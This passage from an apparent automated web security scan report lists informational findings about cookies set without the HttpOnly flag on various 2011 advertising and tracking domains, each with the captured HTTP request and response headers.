The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p107223597&PRAd=6003&AR_C=603 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Mon, 15 Aug 2011 18:26:36 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432796; expires=Tue 16-Aug-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p107223597=exp=2&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:26:36 2011&prad=6003&arc=603&; expires=Sun 13-Nov-2011 18:26:36 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=2&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432796
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


8.18. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6034961&rn=0.26338764396496117&c7=http%3A%2F%2Fwww.imdb.com%2F&c3=&c4=http%253A%252F%252Fwww.imdb.com%252F&c5=&c6=&c10=&c15=&c16=&c8=The%20Internet%20Movie%20Database%20(IMDb)&c9=&cv=1.7 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 15 Aug 2011 18:24:02 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:24:02 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


8.19. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:37 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:26:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.20. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035748&d.c=gif&d.o=cnn-adbp-domestic&d.x=110892361&d.t=page&d.u=http%3A%2F%2Fwww.cnn.com%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=33d3453a-80.67.74.137-1310656935

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:45:09 GMT
Connection: close
Set-Cookie: UID=33d3453a-80.67.74.137-1310656935; expires=Wed, 14-Aug-2013 18:45:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.21. http://b.voicefive.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p107223597&c3=6003&c4=603&c5=&c6=1&c7=Mon%20Aug%2015%2018%3A25%3A22%202011&c8=&c9=&c10=&c15=&rn=1313432722 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/?l=1142910522&sz=300x250&wr=h&t=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p97174789=exp=1&initExp=Mon Aug 8 01:36:31 2011&recExp=Mon Aug 8 01:36:31 2011&prad=314453502&arc=210323181&; ar_p45555483=exp=1&initExp=Sun Aug 14 22:53:19 2011&recExp=Sun Aug 14 22:53:19 2011&prad=65427569&arc=36060045&; UID=1dc84e78-80.67.74.137-1312767393; BMX_BR=pid=p107223597&prad=6003&arc=603&exp=1313432722; ar_p107223597=exp=1&initExp=Mon Aug 15 18:25:22 2011&recExp=Mon Aug 15 18:25:22 2011&prad=6003&arc=603&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:26:36 GMT
Connection: close
Set-Cookie: UID=1dc84e78-80.67.74.137-1312767393; expires=Wed, 14-Aug-2013 18:26:36 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

8.22. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.23. http://banners.bookofsex.com/go/page/iframe_cm_26400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.bookofsex.com
Path:   /go/page/iframe_cm_26400

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/page/iframe_cm_26400?pid=p1934513.submad_24810_1_s5232&madirect=http://medleyads.com/spot/c/1313434555/1247371422/13190.html HTTP/1.1
Host: banners.bookofsex.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:59 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,auy/Hn8z06UROlnTRnsrjRPXI3vAl_sKu1jXDJ5hPRln66gvkW4C1ZrfoWzNxGUwuhStvC1krqYaPtlWQwqW27JPCSNo7T4vM_5D3236uF1F3gJc3mNXRQA6jDGKtYo88kh9FEes39vXYaMvz5CnXAQXYVCTRE5Wj6idOSIRLdPO3/Utt0cMZnVylsjqLZD3; path=/; domain=.banners.bookofsex.com
Set-Cookie: v_hash=_english_29272; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: ffadult_tr=r,leHvy3H7731NgBzxtr9HhpO_Jtw3voEigBFMEc1y52houjBG4d6PjPbjfuqQG_Kk; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.banners.bookofsex.com; expires=Wed, 14-Sep-2011 18:55:59 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki45-15.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 24781
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

8.24. http://bpx.a9.com/ads/getad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bpx.a9.com
Path:   /ads/getad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/getad?p=81&v=1&r=884800 HTTP/1.1
Host: bpx.a9.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bMcyM+ZbyQgWfUUUVJt+leVYFchPbhTj0xJaa5lmWyzC

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Set-Cookie: bpx_ustats=H9E6lfkkcKINL0lkLDa7bJcShNvdj16F6DYDYjovIPhCLX94XksgECTBzucy0qr7; Expires=Tue, 16-Aug-2011 18:24:45 GMT; Path=/
Content-Type: text/javascript
Content-Length: 405
Date: Mon, 15 Aug 2011 18:24:45 GMT

a9_render_ad({"s":"300x250","tr":false,"nid":147,"p":81,"n":"Amazon Performance Display Ads Prod","html":"<script language='javascript'>\r\nvar slot = 'tr';\r\nvar base_url = 'http://www.imdb.com/imag
...[SNIP]...

8.25. http://c7.zedo.com/bar/v16-504/c1/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fm.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fm.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6b-8952-4aa4e37ca04c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=157
Expires: Mon, 15 Aug 2011 18:58:17 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

8.26. http://c7.zedo.com/bar/v16-504/c1/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c1/jsc/fmr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/c1/jsc/fmr.js?c=234&a=0&f=&n=187&r=13&d=94&q=&$=&s=0&z=0.1743083985056728 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0; ZFFAbh=957B826,20|2_1#365; ZFFBbh=957B826,20|2_1#0; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=1;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=187,234,94;expires=Tue, 16 Aug 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "91707f6e-8747-4aa4e3834d480"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=124
Expires: Mon, 15 Aug 2011 18:57:44 GMT
Date: Mon, 15 Aug 2011 18:55:40 GMT
Content-Length: 895
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCust
...[SNIP]...

8.27. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC80L21waWQvMzA0NzA4OQ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/data_sync?partner_id=64&exchange_id=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2865308626608336017

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2865308626608336017; Domain=.p-td.com; Expires=Sat, 11-Feb-2012 18:25:05 GMT; Path=/
Location: http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=191&sscs_active=1&partnerUID=2865308626608336017
Content-Length: 0
Date: Mon, 15 Aug 2011 18:25:05 GMT


8.28. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=2&s=1&l=1&t=i&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=957B826,20|2_2#365;expires=Sun, 13 Nov 2011 18:55:36 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=957B826,20|2_2#0;expires=Tue, 14 Aug 2012 18:55:36 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28968
Expires: Tue, 16 Aug 2011 02:58:24 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

GIF89a.............!.......,...........D..;

8.29. http://g.ca.bid.invitemedia.com/pubm_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /pubm_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubm_imp?returnType=image&key=AdImp&cost=2475900&creativeID=130695&message=eJwlzT0OgCAMhuGrmM6S0JYCdeNHT0PcnIx3t.j2Pkm_9AZm2BbSzHFdgMmQKKsPJjSABs4d9.aQU3EBq7qSpbijca8oiuwTzOk8TkK_6NMssULyahksz2sMyzj_eBJ8XoEzGbU-&managed=false HTTP/1.1
Host: g.ca.bid.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=2.4759&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=9438D1EC-137A-41B9-A85A-FC3DB1591307&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbpx.a9.com%2Famzn%2Fiframe.html&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313426573+ \"d7090a0b-960a-46fe-90f5-5e451fe1ab2c\"+ 70238+ 29835+ 1209]}"; camp_freq_p1="eJzjkuF4PYFNgFFi18yln1gUGDV23V//icWA0QLM55LhOLOOBSi7Hir7GkQDZddDZS/dZQbK9kJlT0JlwXwuEY5Vx0EmL940ESjLoMFgwGDBABTtegUS3fb7z0dk0e5mdgEmiS5kUQAIgzND"; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; io_freq_p1="eJzjEuaYFC/AKLFr5tJPLAaMFmCaS5xjj4sAk8R6EEeBQYPBgMmiFywhzDE1WYBZYvGmiVAJBgsGoODkNKAR237/+QgXBAC33hmb"; dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"4\": 1313426573}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 15-Aug-2011 18:25:58 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
